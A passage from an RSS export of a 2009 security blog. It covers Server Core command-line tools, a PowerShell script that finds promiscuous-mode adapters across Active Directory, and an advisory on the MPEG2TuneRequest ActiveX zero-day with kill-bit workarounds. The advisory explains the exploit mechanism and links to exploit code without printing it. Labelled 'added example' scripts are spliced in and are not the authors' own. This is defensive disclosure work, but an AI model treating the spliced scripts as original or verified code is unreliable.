<p>There are quite a few configurable options to put in an answer file. You can check the help by typing: <strong>dcpromo /?:promotion</strong></p>

<p><strong><span style="text-decoration: underline;">MORE IN THE CLI</span></strong></p>

<p>Now you have a fully functioning server, are able to manage it with your MMC, and can connect via Remote Desktop. Although there are hundreds of commands you can use in the CLI, one that can do an enormous amount of tasks is <strong>wmic.exe</strong>. WMIC is a tool with hundreds of options for WMI. You can do just about anything here. A few examples:</p>

<pre><code>wmic useraccount list
wmic process list
wmic share list
</code></pre>

<p>The above examples are all very simple queries for information. You can also use wmic to add and modify (ie. not just list shares, but create or change them). To see a full list of options: <strong>wmic /?</strong></p>


<p><span style="text-decoration: underline;"><strong>POWERSHELL</strong></span></p>

<p>Powershell is now included with R2 and you can enable it just like any other feature. Powershell provides a shell and scripting language which will open up a world of options for administrating your Windows environment. What gives this shell its power is that it accepts and returns .NET objects. Instead of getting stdout, you can get an object and then perform actions with that object or get its properties. With a couple of lines of script code, you can pull all users from an OU and set their description field, or check when the passwords were last set. That is just one simple example working with objects using the DirectoryServices interface, and there are many others.</p>

<p><span style="text-decoration: underline;"><strong>CONCLUSION</strong></span></p>

<p>It is nice to see that the command line has made a return in the Windows world. If you’re unlike me, who typically has five or six command prompts open during a regular day, don’t be intimidated by it. Server Core can be a lean, secure, and well-managed option in your environment. It may take a little time getting used to not reaching for the mouse and clicking on the start button, but at the end of the day you will have that extra bit of satisfaction knowing exactly what occurred without a GUI keeping the details behind the scenes.</p>

<hr />

<p>References:</p>

<ul>
<li>Real Men Don&#8217;t Click&#8211;The Project: <a href="http://isg.ee.ethz.ch/tools/realmen/">http://isg.ee.ethz.ch/tools/realmen/</a></li>
<li>Server Core Installation: <a href="http://technet.microsoft.com/en-us/library/cc753802(WS.10).aspx">http://technet.microsoft.com/en-us/library/cc753802(WS.10).aspx</a></li>
<li>Using DISM: <a href="http://www.windowsnetworking.com/articles_tutorials/Deploying-Windows-7-Part2.html">http://www.windowsnetworking.com/articles_tutorials/Deploying-Windows-7-Part2.html</a></li>
<li>DISM Command Line Options: <a href="http://technet.microsoft.com/en-us/library/dd772580(WS.10).aspx">http://technet.microsoft.com/en-us/library/dd772580(WS.10).aspx</a></li>
<li>WMIC: <a href="http://technet.microsoft.com/en-us/library/bb742610.aspx">http://technet.microsoft.com/en-us/library/bb742610.aspx</a></li>
<li>Powershell: <a href="http://www.microsoft.com/windowsserver2003/technologies/management/powershell/default.mspx">http://www.microsoft.com/windowsserver2003/technologies/management/powershell/default.mspx</a></li>
<li>Windows 2008 Command Line List (A-Z): <a href="http://technet.microsoft.com/en-us/library/cc772390(WS.10).aspx">http://technet.microsoft.com/en-us/library/cc772390(WS.10).aspx</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/">The &#8220;Aurora&#8221; IE Exploit Used Against Google in Action</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/09/2008-server-to-the-core/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Who’s Being Promiscuous in Your Active Directory?</title>
		<link>http://praetorianprefect.com/archives/2009/09/whos-being-promiscuous-in-your-active-directory/</link>
		<comments>http://praetorianprefect.com/archives/2009/09/whos-being-promiscuous-in-your-active-directory/#comments</comments>
		<pubDate>Tue, 15 Sep 2009 00:18:50 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[active directory]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[powershell]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[WMI]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=719</guid>
		<description><![CDATA[I’m always a fan of more queries and peaks at what is going on in my AD domain, especially at what is happening on the workstations. I was working on some WMI queries to get information about network interfaces using the Win32_NetworkAdapterConfiguration class, and thought about promqry.exe. Promqry is a tool provided by Microsoft to [...]]]></description>
<content:encoded><![CDATA[<p>I’m always a fan of more queries and peeks at what is going on in my AD domain, especially at what is happening on the workstations. I was working on some WMI queries to get information about network interfaces using the Win32_NetworkAdapterConfiguration class, and thought about promqry.exe. <a href="http://support.microsoft.com/kb/892853" target="_blank">Promqry</a> is a tool provided by Microsoft to query a computer’s network interfaces and return whether any is running in promiscuous mode.</p>

<p>This information can be handy for several reasons:</p>

<ul>
    <li>An interface running in promiscuous mode may be due to the user running a network sniffer such as Wireshark.</li>
    <li>An interface running in promiscuous mode may be due to the user running virtualization software, such as Virtual PC.</li>
    <li>An interface running in promiscuous mode may be due to malicious code.</li>
</ul>

<p>I definitely want to know if users are running network sniffers, or virtualization software (likely the guests are not licensed or managed causing rogue workstations in the environment). Of course any potential activity that may be caused by malware or malicious code is a concern as well.</p>

<p>You could very easily download promqry and run a <em>for</em> loop against your machines. I wanted to use WMI for this task instead and rather than a text file, use the directoryservices object to query my AD for computers.</p>

<p>I couldn’t find any property in Win32_NetworkAdapterConfiguration to check for this, but I found <a href="http://windowsir.blogspot.com/2005/02/promqry-revisited.html" target="_blank">this post</a> on promqry which tracked down the WMI classes it uses. That led me in the right direction. The other key to this is what MSNdis_CurrentPacketFilter returns. Microsoft documents this <a href="http://msdn.microsoft.com/en-us/library/bb648512.aspx" target="_blank">here</a> and we are checking if the NDIS_PACKET_TYPE_PROMISCUOUS bit is enabled.</p>

<p>Below is a quick Powershell script which will grab computer objects from AD, then use WMI and the MSNdis_CurrentPacketFilter class to check for promiscuous mode. You can incorporate this WMI query with Win32_NetworkAdapterConfiguration and get a better picture of the interface network settings:</p>

<pre><code># Suppress errors from unreachable hosts; failures are reported below instead
$ErrorActionPreference = "SilentlyContinue"

# NDIS_PACKET_TYPE_PROMISCUOUS bit in NdisCurrentPacketFilter (see the MSDN link above)
$NDIS_PACKET_TYPE_PROMISCUOUS = 0x00000020

$PingTest = New-Object System.Net.NetworkInformation.Ping
# Every computer object in the current domain
$Filter = "(&amp;(ObjectCategory=computer))"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher($Filter)
ForEach ($comp in $Searcher.Findall()) {
    $strComputer = $comp.properties.item("Name")
    write-host "Checking: $strComputer"
    # Ping first so we don't wait for RPC to time out on machines that are off
    if ($PingTest.Send($strComputer).Status -eq "Success") {
        $colComputer = get-wmiObject -class "MSNdis_CurrentPacketFilter" -namespace "root\WMI" -comp $strComputer
        if ($colComputer -eq $null) {
            write-host "Couldn't connect to WMI" }
        else {
            # One instance per NDIS interface on the remote machine
            foreach ($adapter in $colComputer) {
                $val = $adapter.NdisCurrentPacketFilter
                if ($val -band $NDIS_PACKET_TYPE_PROMISCUOUS) {
                    $inst = $adapter.InstanceName
                    write-host "Interface: $inst"
                    write-host "The NDIS_PACKET_TYPE_PROMISCUOUS value is set" -foregroundcolor red -backgroundcolor yellow
                }
            }
        }
    }
    else { write-host "Could not ping, machine not queried." }
}
</code></pre>

<p>The following screenshot shows the results. I don’t like waiting for RPC to time out when the machine is off or not reachable, so a quick ping check before querying WMI speeds things up. Also, when an interface has the bit set, the output is highlighted with red text on a yellow background. You could wrap an email function around it and schedule this so that you are alerted when it comes up.</p>
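<p>The following is an added example, not the author&#8217;s script: it joins MSNdis_CurrentPacketFilter with Win32_NetworkAdapterConfiguration, as suggested above, so that each promiscuous interface is reported together with its MAC and IP addresses instead of just an NDIS instance name. The join, which assumes the NDIS InstanceName equals the adapter&#8217;s Description in Win32_NetworkAdapterConfiguration, is an assumption to verify on your own hardware.</p>

```powershell
# Added example (not from the original post): report promiscuous-mode
# interfaces with the addressing details from Win32_NetworkAdapterConfiguration.
# Assumption: MSNdis_CurrentPacketFilter.InstanceName matches
# Win32_NetworkAdapterConfiguration.Description on the same host.

$NDIS_PACKET_TYPE_PROMISCUOUS = 0x00000020   # per the MSDN reference linked above

function Get-PromiscuousAdapter {
    param([string]$ComputerName = '.')

    # Both queries need local administrator rights on the target, as noted below.
    $filters = Get-WmiObject -Class MSNdis_CurrentPacketFilter -Namespace 'root\WMI' `
        -ComputerName $ComputerName -ErrorAction Stop
    $configs = Get-WmiObject -Class Win32_NetworkAdapterConfiguration `
        -ComputerName $ComputerName -ErrorAction Stop

    foreach ($f in $filters) {
        # Skip interfaces whose packet filter does not have the promiscuous bit
        if (-not ($f.NdisCurrentPacketFilter -band $NDIS_PACKET_TYPE_PROMISCUOUS)) { continue }

        # Match the NDIS instance to its adapter configuration (assumption noted above)
        $cfg = $configs | Where-Object { $_.Description -eq $f.InstanceName } | Select-Object -First 1

        New-Object PSObject -Property @{
            ComputerName = $ComputerName
            Interface    = $f.InstanceName
            PacketFilter = ('0x{0:X8}' -f [int64]$f.NdisCurrentPacketFilter)
            MACAddress   = $(if ($cfg) { $cfg.MACAddress } else { $null })
            IPAddress    = $(if ($cfg -and $cfg.IPAddress) { $cfg.IPAddress -join ',' } else { $null })
            DHCPEnabled  = $(if ($cfg) { $cfg.DHCPEnabled } else { $null })
        }
    }
}

# Local machine by default; pass -ComputerName to check a workstation from the AD loop above.
Get-PromiscuousAdapter | Format-Table -AutoSize Interface, IPAddress, MACAddress, PacketFilter
```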

<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/ScreenHunter_06Oct.0120.51.gif"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="ScreenHunter_06 Oct. 01 20.51" src="http://praetorianprefect.com/wp-content/uploads/2009/10/ScreenHunter_06Oct.0120.51_thumb.gif" border="0" alt="ScreenHunter_06 Oct. 01 20.51" width="244" height="173" /></a></p>


<p>You will need proper access to the workstations to query root\WMI so when you run this in a domain, your account should have local administrator privileges to the computers it will query. If it doesn’t, the command will return “Couldn’t connect to WMI”.</p>

<p>Finally, if you haven’t looked at the MSNdis class yet, I suggest taking a look, especially at MSNdis_80211 which will query various wireless information that may be of interest. There isn’t a whole lot of documentation on it, so I’ll work on getting some details together and maybe draft a Powershell script to find wireless adapters and networks they are connected to or available networks close enough to connect to. Until then, enjoy finding those promiscuous mode adapters in your domain.</p>


<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/09/whos-being-promiscuous-in-your-active-directory/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Why former criminals aren&#8217;t always the best experts</title>
		<link>http://praetorianprefect.com/archives/2009/08/why-former-criminals-arent-always-the-best-experts/</link>
		<comments>http://praetorianprefect.com/archives/2009/08/why-former-criminals-arent-always-the-best-experts/#comments</comments>
		<pubDate>Mon, 10 Aug 2009 01:30:53 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[security conference]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=629</guid>
		<description><![CDATA[The Onion reminds us why former criminals don&#8217;t always make the best &#8220;experts&#8221;.  I hope information security conference organizers are watching.

Bear with the Onion&#8217;s silly advertising in the beginning.

Ex-Pedophile Shares Tips On How To Make Your Kids Less Attractive

Related Posts:

iPhone 4 Ordering and Session Switching
May&#8217;s Patch Tuesday
March&#8217;s Patch Tuesday
Press F1 for Help, pwned.
First Patch [...]]]></description>
			<content:encoded><![CDATA[<p>The Onion reminds us why former criminals don&#8217;t always make the best &#8220;experts&#8221;.  I hope information security conference organizers are watching.</p>

<p><em>Bear with the Onion&#8217;s silly advertising in the beginning.</em></p>

<p><object width="480" height="430"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://www.theonion.com/content/themes/common/assets/onn_embed/embedded_player.swf?image=http%3A%2F%2Fwww.theonion.com%2Fcontent%2Ffiles%2Fimages%2FEX-PEDOPHILE_article.jpg&#038;videoid=97182&#038;title=Ex-Pedophile%20Shares%20Tips%20On%20How%20To%20Make%20Your%20Kids%20Less%20Attractive" /><param name="wmode" value="transparent" /><embed src="http://www.theonion.com/content/themes/common/assets/onn_embed/embedded_player.swf" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" wmode="transparent" width="480" height="430" flashvars="image=http%3A%2F%2Fwww.theonion.com%2Fcontent%2Ffiles%2Fimages%2FEX-PEDOPHILE_article.jpg&#038;videoid=97182&#038;title=Ex-Pedophile%20Shares%20Tips%20On%20How%20To%20Make%20Your%20Kids%20Less%20Attractive"></embed></object><br /><a href="http://www.theonion.com/content/video/ex_pedophile_shares_tips_on_how?utm_source=videoembed">Ex-Pedophile Shares Tips On How To Make Your Kids Less Attractive</a></p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/08/why-former-criminals-arent-always-the-best-experts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Video ActiveX Control Vulnerability</title>
		<link>http://praetorianprefect.com/archives/2009/07/microsoft-video-activex-control-vulnerability/</link>
		<comments>http://praetorianprefect.com/archives/2009/07/microsoft-video-activex-control-vulnerability/#comments</comments>
		<pubDate>Wed, 08 Jul 2009 06:04:23 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[ActiveX]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=319</guid>
		<description><![CDATA[Microsoft is recommending setting the kill bit for an ActiveX control object, MPEG2TuneRequest, to avoid an in the wild zero day exploit that allows for remote code execution when a web site containing the exploit is browsed by a user with Internet Explorer.]]></description>
			<content:encoded><![CDATA[<p>Microsoft is recommending setting the kill bit for the MPEG2TuneRequest ActiveX control object to block an in-the-wild zero-day exploit that allows remote code execution when a user browses a web site containing the exploit with Internet Explorer.  No user interaction beyond visiting the page is required for the exploit to succeed, and the resulting code runs with the rights of the logged-on user (a user running as an administrator therefore hands the exploit an administrative context).  Microsoft reports that this control has no legitimate use inside IE, so there is no reason to wait for a Microsoft patch before disabling it.</p>

<h4>Background</h4>

<p>The news hit the web at large on July 6th when Microsoft released advisory <a href="http://www.microsoft.com/technet/security/advisory/972890.mspx">972890</a>; IBM ISS, however, reports the first known exploit on June 11th.  The vulnerability, found by researchers Alex Wheeler and Ryan Smith (ISS employees at the time), was reported to Microsoft in 2008, which has drawn criticism from at least one reporter covering the IT marketplace: <a href="http://www.eweek.com/c/a/Security/Was-Microsoft-Slow-to-Patch-Video-ActiveX-Vulnerability-130458/?kc=rss">eWeek’s Brian Prince</a>.  The flaw would have been present since IE version 6 SP1.</p>

<h4>Exploit Details</h4>

<p>The exploit is <a href="http://blogs.technet.com/srd/archive/2009/07/06/new-vulnerability-in-mpeg2tunerequest-activex-control-object-in-msvidctl-dll.aspx">described</a> by MSRC engineer Chengyun Chu as a “browse and get owned attack vector”.  Once the user navigates to a web site purposely hosting the exploit, or a legitimate web site that has been compromised to host it, no further user interaction is required. In-the-wild examples (approximately 967 Chinese web sites, <a href="http://blog.trendmicro.com/zero-day-microsoft-directshow-mpeg2tunerequest-exploit-leads-to-killav-malware/">according</a> to Trend Micro) have carried the exploit in both .gif and .jpg files.  Trend Micro found web sites that redirect the user several times before loading a .jpg file containing the exploit, which on success drops malware detected as WORM_KILLAV.AI. As its name suggests, this malware terminates antivirus processes and loads additional malicious code.</p>

<p>The exploit is based on an overflow condition created in the msvidctl.dll library when a crafted file is provided as input; the overflow overwrites a handler, which is then pointed at the exploit’s shellcode, already placed in the heap via <a href="http://en.wikipedia.org/wiki/Heap_spraying">heap spraying</a>. The object that accepts the crafted input, BDATuner.MPEG2TuneRequest.1, is associated with CLSID 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF, and thus this is the primary CLSID for which a kill bit needs to be set. Because the other control objects hosted by msvidctl.dll share the same library code, Microsoft recommends setting the kill bit for all of them.</p>

<p>As security vendors such as Symantec, ISS, and others are aware of the problem, antivirus and IDS signatures are either available or forthcoming.</p>

<h4>Work Around Details</h4>

<p>Microsoft provides an automated <a href="http://go.microsoft.com/?linkid=9672398">Fix it</a> which prevents Internet Explorer from instantiating the COM object by setting the kill bit for the control in the registry. This involves adding a DWORD value named Compatibility Flags to each of 45 keys under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility, one per Class Identifier relating to the Microsoft Video ActiveX Control. More information can be found in the <a href="http://www.microsoft.com/technet/security/advisory/972890.mspx">security advisory</a>.</p>

<p>To implement the workaround on a single computer, you can manually enter the DWORD value 1024 (0x00000400) for Compatibility Flags under each of the 45 class ID keys, or import this <a href="http://praetorianprefect.com/wp-content/uploads/2009/07/kb972890.txt">reg file</a> with the values. Note that 0x400 is a bit flag: if a key already holds other compatibility flags, OR the kill bit into the existing value rather than overwriting it.</p>

<p>For an enterprise environment, you have two options for deploying this workaround to your workstations. First, a computer startup script can import the <a href="http://praetorianprefect.com/wp-content/uploads/2009/07/kb972890.txt">reg file</a> with the values each time a machine boots. Second, a custom ADM file can be added to a group policy object applied to your workstations. Which option to choose depends on preference and your environment.</p>

<h4>Computer Start-up Script</h4>

<p>You may already have a group policy with a computer startup script enabled. Add a line that imports this <a href="http://praetorianprefect.com/wp-content/uploads/2009/07/kb972890.txt">reg file</a>. A computer startup script is suggested because a user logon script runs in the user&#8217;s context, and the user may not have permission to modify the keys under HKEY_LOCAL_MACHINE. You can find more information on configuring computer startup scripts <a href="http://technet.microsoft.com/en-us/library/cc779329(WS.10).aspx">here</a>.</p>

<h4>Custom ADM File in Group Policy</h4>

<p>The challenge with an ADM file for this particular workaround is that each class ID to be modified is a separate key in the registry rather than a value under a single key. So, instead of one configuration entry in a group policy object that modifies every value, you need an entry for each key. Fortunately, the leg work has been done in this <a href="http://praetorianprefect.com/wp-content/uploads/2009/07/kb972890.adm">example custom ADM file</a>, which you can cut and paste into a larger file you may already have.</p>

<p>Save the file where your GPO editor can browse to it. In Computer Configuration, Administrative Templates, right click and select Add/Remove Templates. Once you add the template, you&#8217;ll have to ensure your filtering is set up to show &#8220;unmanaged&#8221; settings, which are custom ADM entries that write outside the Policies keys and therefore tattoo the registry (the values remain after the GPO is unlinked). Under filtering, in your GPO editor, uncheck the option as shown:</p>

<p><div id="attachment_374" class="wp-caption alignnone" style="width: 393px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/07/gpedit23.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/07/gpedit23.jpg" alt="gpedit" title="gpedit23" width="383" height="370" class="size-full wp-image-374" /></a><p class="wp-caption-text">gpedit</p></div><br /></p>

<p>Once the ADM is added, and the filter option is cleared, you will see the configuration entries for the Microsoft Video ActiveX kill bit. Set them all to Enabled as shown:</p>

<p><div id="attachment_377" class="wp-caption alignnone" style="width: 642px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/07/gpedit3.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/07/gpedit3.jpg" alt="gpedit" title="gpedit3" width="632" height="507" class="size-full wp-image-377" /></a><p class="wp-caption-text">gpedit</p></div><br /></p>

<p>Once you link the policy to all your Windows XP and Windows Server 2003 computers, you will have implemented the workaround. </p>
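<p>The script below is an added example, not the post&#8217;s reg file or ADM file and not Microsoft&#8217;s Fix it. It generates both artifacts from one CLSID list and checks an exported key afterwards. It assumes the documented location, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}, and the kill bit as 0x400 in the Compatibility Flags DWORD. The CLSID list holds only the MPEG2TuneRequest CLSID named above (the other 44 come from the advisory), the all-zero CLSID in the constructed sample export is a placeholder rather than a real control, and the function names (build_reg, build_adm, parse_reg, killbit_status) are the example&#8217;s own.</p>

```python
"""Generate and verify Internet Explorer ActiveX kill-bit settings.

Added example, not the post's reg/ADM files or Microsoft's Fix it.
Assumed (documented) location and flag:
  HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{CLSID}
  "Compatibility Flags" DWORD, bit 0x400 = kill bit (IE will not instantiate)
"""
import re

KILL_BIT = 0x00000400
KEY_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
VALUE_NAME = "Compatibility Flags"

# Only the MPEG2TuneRequest CLSID from advisory 972890 is listed here; the
# other 44 msvidctl.dll CLSIDs come from the advisory and belong in this list too.
CLSIDS = ["{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}"]

_KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
_DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9A-Fa-f]{1,8})$')
_CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")


def build_reg(clsids, current=None):
    """Return .reg text that sets the kill bit for each CLSID.

    `current` maps CLSID -> existing Compatibility Flags (e.g. from parse_reg);
    the kill bit is OR-ed into that value so other flag bits survive instead
    of being overwritten with exactly 0x400.
    """
    current = current or {}
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        flags = current.get(clsid.upper(), 0) | KILL_BIT
        lines.append(f"[{KEY_ROOT}\\{clsid}]")
        lines.append(f'"{VALUE_NAME}"=dword:{flags:08x}')
        lines.append("")
    return "\n".join(lines)


def build_adm(clsids):
    """Return a legacy ADM template with one Enabled/Disabled policy per CLSID.

    KEYNAME lies outside the Policies keys, so the GPO editor lists these only
    with the managed-settings-only filter cleared, and the writes tattoo the
    registry (they stay after the GPO is unlinked). Disabled writes 0, which
    clears every flag bit, not only the kill bit.
    """
    sub_key = KEY_ROOT.split("\\", 1)[1]  # strip the HKEY_LOCAL_MACHINE hive prefix
    out = ["CLASS MACHINE", 'CATEGORY "Microsoft Video ActiveX kill bits (KB972890)"']
    for clsid in clsids:
        out += [
            f'  POLICY "Kill bit for {clsid}"',
            f'    KEYNAME "{sub_key}\\{clsid}"',
            f'    VALUENAME "{VALUE_NAME}"',
            f"    VALUEON NUMERIC {KILL_BIT}",
            "    VALUEOFF NUMERIC 0",
            "  END POLICY",
        ]
    out.append("END CATEGORY")
    return "\n".join(out)


def parse_reg(text):
    """Map CLSID -> Compatibility Flags from a .reg export of the ActiveX Compatibility key.

    regedit writes exports as UTF-16; decode the file before calling this.
    """
    flags, clsid = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            key = m.group("key")
            cm = _CLSID_RE.search(key)
            under_root = key.upper().startswith(KEY_ROOT.upper() + "\\")
            clsid = cm.group(0).upper() if (cm and under_root) else None
            continue
        m = _DWORD_RE.match(line)
        if m and clsid and m.group("name") == VALUE_NAME:
            flags[clsid] = int(m.group("hex"), 16)
    return flags


def killbit_status(reg_text, clsids):
    """Return {CLSID: True if bit 0x400 is set}. A bit test, not `== 0x400`."""
    flags = parse_reg(reg_text)
    return {c: bool(flags.get(c.upper(), 0) & KILL_BIT) for c in clsids}


# Constructed sample export (not from a real machine): the MPEG2TuneRequest key
# already carries the kill bit; the all-zero CLSID is a placeholder control whose
# key holds an unrelated flag (0x4) and no kill bit.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000001}]
"Compatibility Flags"=dword:00000004
"""

if __name__ == "__main__":
    placeholder = "{00000000-0000-0000-0000-000000000001}"
    print(killbit_status(SAMPLE_EXPORT, CLSIDS + [placeholder]))
    # Merge the kill bit into the placeholder's existing flags -> dword:00000404
    print(build_reg([placeholder], parse_reg(SAMPLE_EXPORT)))
    print(build_adm(CLSIDS))
```

<p>Apply the generated .reg on the workstation with regedit /s from the computer startup script, then re-export the ActiveX Compatibility key with reg export and feed the (UTF-16) file to killbit_status to confirm every CLSID reports True. The check is a bit test rather than a comparison with 0x400 because Compatibility Flags can carry other bits, and build_reg ORs the kill bit into any existing value for the same reason. On 64-bit Windows the 32-bit IE also reads the key under SOFTWARE\Wow6432Node, which this example does not cover.</p>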

<h4>Active X</h4>

<p>ActiveX, while largely associated with Internet browsing, is not a program that runs inside the browser but rather a component technology used throughout the Windows operating system. Only Windows XP and certain configurations of Windows Server 2003 are affected; a similar control exists in Windows Vista and Windows Server 2008 but is not vulnerable.</p>

<h4>Example Exploits</h4>

<p>Both links provide example exploit code:</p>

<ul>
<li><a href="http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/">http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/</a></li>
<li><a href="http://www.csis.dk/en/news/news.asp?tekstID=799">http://www.csis.dk/en/news/news.asp?tekstID=799</a></li>
</ul>

<h4>References</h4>

<ul>
<li><a href="http://www.microsoft.com/technet/security/advisory/972890.mspx">Microsoft Security Advisory (972890)</a></li>
<li><a href="http://blog.trendmicro.com/zero-day-microsoft-directshow-mpeg2tunerequest-exploit-leads-to-killav-malware/">Zero-day MPEG2TuneRequest Exploit Leads to KILLAV</a></li>
<li><a href="http://blogs.technet.com/srd/archive/2009/07/06/new-vulnerability-in-mpeg2tunerequest-activex-control-object-in-msvidctl-dll.aspx">Microsoft Security Research &amp; Defense</a></li>
<li><a href="http://www.symantec.com/connect/blogs/another-unpatched-vulnerability-being-massively-exploited-internet-explorer">Another Unpatched Vulnerability is Being Massively Exploited via Internet Explorer</a></li>
</ul>

<h4>Vulnerability Cross Reference</h4>

<ul>
<li><a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0015">CVE-2008-0015</a></li>
<li>Bugtraq ID: <a href="http://www.securityfocus.com/bid/35558">35558</a></li>
<li>US-CERT Cyber Security Alert: <a href="http://www.us-cert.gov/cas/techalerts/TA09-187A.html">TA09-187A</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/07/turning-an-atm-into-a-slot-machine/">Turning an ATM into a Slot Machine</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/07/microsoft-video-activex-control-vulnerability/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Warnings Ignored, Thousands of Websites Suffer</title>
		<link>http://praetorianprefect.com/archives/2009/06/warnings-ignored-thousands-of-websites-suffer/</link>
		<comments>http://praetorianprefect.com/archives/2009/06/warnings-ignored-thousands-of-websites-suffer/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 20:27:57 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=314</guid>
		<description><![CDATA[“We have been working diligently to recover the information that we can. Currently if your VPS is not responding it is best to consider that all data and information is lost…” This is the start of a message posted on VAServ’s website, a UK-based provider of virtual private servers.  VAServ uses HyperVM,  a virtualization application [...]]]></description>
